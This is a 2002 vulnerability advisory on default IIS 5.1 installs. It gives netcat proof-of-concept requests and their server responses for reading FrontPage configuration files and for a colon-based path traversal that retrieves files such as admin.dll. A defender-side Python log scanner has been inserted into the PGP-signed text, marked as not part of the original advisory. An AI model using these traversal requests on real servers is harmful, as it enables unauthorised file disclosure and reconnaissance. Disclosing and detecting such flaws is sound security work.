-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 .---------------.
/ NtWaK0 Advisory \
+---------------------------------------------------------------------------
: Affected : Windows XP with IIS 5.1
: Type     : MULTIPLE Remote Issues
: Type     : Remote/Local Security Issues
: Date     : 10-02-2002
: Author   : NtWaK0 @ www.SafeHack.com
: Credit   : NtWaK0 @ www.SafeHack.com
+---------------------------------------------------------------------------

+---------------------.
| Remote/Local Exploit \
+-----------------------`---------------------------------------------------

                        * * * www.SafeHack.com * * *

+-----------.
| Disclaimer \
+-------------`-------------------------------------------------------------

This material is presented for informational and entertainment purposes
only, and to satisfy the curious. Any activities described in this file
which involve vandalism, theft, or any other illegal activities are
recounted from third-party conversations. I do not condone or encourage
vandalism or theft. I do not accept any liability for anything anyone
does with this information. So, don't shoot the messenger.
Remember: Use a computer in ways that ensure respect for your fellows.

+-------.
| T.O.C. \
+---------`-----------------------------------------------------------------

  [ Brief History ]
  [ The Problem   ]
  [ The Solution  ]

+--------------.
| Brief History \
+----------------`----------------------------------------------------------

I had the chance to play for a couple of hours with IIS 5.1 on a friend's
box, thanks to Recon. While I was trying some stuff on IIS 5.1 I found
MANY problems with the default IIS 5.1 installation and with files
installed by default.

This one is not the same as the one reported earlier. The one reported
before had to deal with "GET /_vti_bin/shtml.dll". A copy of it can be
found at:

    http://www.safehack.com/Advisory/shtmldump.txt

+---------+
| Test OS |
+---------+

Tested on Windows XP with IIS 5.1.

Please continue to read for more details.

+------------.
| The Problem \
+--------------`------------------------------------------------------------

>>> 1- Issue <<<

Identifying the web directory installation. By sending
"GET /_vti_pvt/access.cnf" you can identify the web installation directory
(the PasswordDir value in the response). As we all know, this is a helpful
piece of information for someone who is going to attack your web site.

>>> Proof-Of-Concept <<<

    C:\Tool>nc -v -n 67.82.156.211 81
    (UNKNOWN) [67.82.156.211] 81 (?) open
    GET /_vti_pvt/access.cnf
    vti_encoding:SR|utf8-nl
    RealmName:LAMER
    InheritPermissions:false
    PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

There is another security issue with this too: "InheritPermissions:false".
This reveals whether that folder inherits its security permissions.

>>> 2- Issue <<<

>>> Proof-Of-Concept <<<

    C:\Tool>nc -v -n 67.82.156.211 81
    (UNKNOWN) [67.82.156.211] 81 (?) open
    GET /_vti_pvt/botinfs.cnf

    vti_encoding:SR|utf8-nl
    D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\
    40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar

>>> 3- Issue <<<

>>> Proof-Of-Concept <<<

    C:\Tool>nc -v -n 67.82.156.211 81
    (UNKNOWN) [67.82.156.211] 81 (?) open
    GET /_vti_pvt/bots.cnf
    vti_encoding:SR|utf8-nl
    vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared
    \\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
    vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft
    \\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar
    \\\\fp4Avnb.dll

>>> 4- Issue <<<

Using "GET /iishelp/common/colegal.htm" you can access other files under
the web structure. I did not have a chance to test it on files above the
web structure. Like I said, I do not run IIS 5.1 but a friend does. One of
these days I am going to buy more memory for one of my old boxes and slap
IIS 5.1 on it to be able to do better tests.

>>> Proof-Of-Concept <<<

    C:\Tool>nc -v -n 67.82.156.211 81
    (UNKNOWN) [67.82.156.211] 81 (?) open
    GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf
    vti_encoding:SR|utf8-nl
    RealmName:LAMER
    InheritPermissions:false
    PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

writeto.cnf [Extracted From]
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp

    Back links for files that can be written to by users of the web, such
    as Save Results Form handler result files. Files that can be written
    to by users of the web have a looser security setting than regular
    web content.

    C:\Tool>nc -v -n 67.82.156.211 81
    (UNKNOWN) [67.82.156.211] 81 (?) open
    GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll
    [binary output: the PE image of admin.dll, beginning with the "MZ"
     DOS stub ("This program cannot be run in DOS mode"), the "Rich"
     header and the "PE" header]

    C:\Tool>nc -v -n 67.82.156.211 81
    (UNKNOWN) [67.82.156.211] 81 (?) open
    GET /_vti_pvt/linkinfo.cnf
    vti_encoding:SR|utf8-nl
    javascript\:loadhelpfront();:localstart.asp
    javascript\:activate(<%=iver%>);:localstart.asp
    http\://www.safehack.com:index.htm
    /iishelp/common/colegal.htm:localstart.asp

NOTE: A search on Google for "writeto.cnf" returned alarming results:
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta=

+-------------.
| The Solution \
+---------------`-----------------------------------------------------------

No idea. Vendor was informed.

If you are going to use the found issues, credit must be given to the
author.
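As an added, defender-side example that is not part of the original advisory: a small Python scanner that reads IIS W3C extended log lines and flags the request shapes shown above, namely direct reads of `_vti_pvt/*.cnf`, the `colegal.htm:../` colon-separated traversal, and reads of `_vti_bin/_vti_adm/admin.dll`. It also resolves what path a traversal request actually lands on, so the analyst sees the target rather than the raw string. The log lines are constructed samples, the `#Fields:` order is an assumption about the log configuration, and the finding tags are my own names.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended log format (not taken from the advisory).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.1
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-02-10 12:00:01 10.0.0.5 GET /index.htm - 200
2002-02-10 12:00:02 10.0.0.5 GET /_vti_pvt/access.cnf - 200
2002-02-10 12:00:03 10.0.0.5 GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf - 200
2002-02-10 12:00:04 10.0.0.9 GET /iishelp/common/colegal.htm - 200
2002-02-10 12:00:05 10.0.0.7 GET /_vti_bin/shtml.dll - 404
2002-02-10 12:00:06 10.0.0.5 GET /%5Fvti%5Fpvt/writeto%2Ecnf - 200
2002-02-10 12:00:07 10.0.0.5 GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll - 200
"""

# The "<served file>:../..." shape used in the advisory's traversal requests.
COLON_TRAVERSAL = re.compile(r":(\.\./)+")


def normalize_uri(stem: str) -> str:
    """Decode (twice, to undo double-encoding), lowercase and slash-normalize a stem."""
    decoded = stem
    for _ in range(2):
        decoded = unquote(decoded)
    return decoded.replace("\\", "/").lower()


def effective_target(stem: str) -> str:
    """Resolve the path a 'file:../x' style request reaches.

    The text after the first colon is treated as relative to the directory
    of the served file; '..' segments are collapsed and any that climb past
    the web root are clamped at '/'.
    """
    if ":" not in stem:
        return posixpath.normpath(stem)
    served, _, rel = stem.partition(":")
    return posixpath.normpath(posixpath.join(posixpath.dirname(served), rel))


def classify(stem: str) -> list:
    """Return the advisory-relevant finding tags for one cs-uri-stem."""
    norm = normalize_uri(stem)
    target = effective_target(norm)
    findings = []
    if COLON_TRAVERSAL.search(norm):
        findings.append("colon-traversal")
    elif "/../" in norm or norm.endswith("/.."):
        findings.append("dot-dot-traversal")
    if "/_vti_pvt/" in target and target.endswith(".cnf"):
        findings.append("fp-private-cnf")          # access.cnf, bots.cnf, ...
    if target.startswith("/_vti_bin/_vti_adm/"):
        findings.append("fp-admin-binary")         # admin.dll fetched as a file
    return findings


def scan_iis_log(text: str) -> list:
    """Scan W3C extended log text; return one dict per request that matched."""
    fields = None
    hits = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]            # column names follow the directive
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                             # malformed line; skip rather than guess
        rec = dict(zip(fields, values))
        findings = classify(rec["cs-uri-stem"])
        if findings:
            hits.append({
                "client": rec["c-ip"],
                "stem": rec["cs-uri-stem"],
                "target": effective_target(normalize_uri(rec["cs-uri-stem"])),
                "status": int(rec["sc-status"]),
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["target"], ",".join(hit["findings"]))
```

A 200 status on a `fp-private-cnf` or `fp-admin-binary` hit means the file was actually served; a 404 on the same path is still worth noting as reconnaissance against the web root. Decoding twice before matching keeps a `%255F`-style encoded underscore from slipping past the `_vti_pvt` check.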
NtWaK0 @ www.safehack.com
+---------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV
w0aAHeJqCi7MoCs62m5AR8dm
=u7kB
-----END PGP SIGNATURE-----

________________________________________________________________________
"The only secure computer is one that's unplugged, locked in a safe, and
buried 20 feet under the ground in a secret location... and I'm not even
too sure about that one" -- Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good   www.SafeHack.com | Je Pense, Donc Je Suis    \(|)/
I know I ain't perfect, but I'm 99 point 9 percent :)            --(")--
RFCs are meant to be read and followed... :)                      /`\
                                                                 NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a cybernetic
ride. Are you connected to the right cybernet? If you are, finally you are
connected to my brain.
________________________________________________________________________
-=- Use a computer in ways that ensure respect for your fellows -=-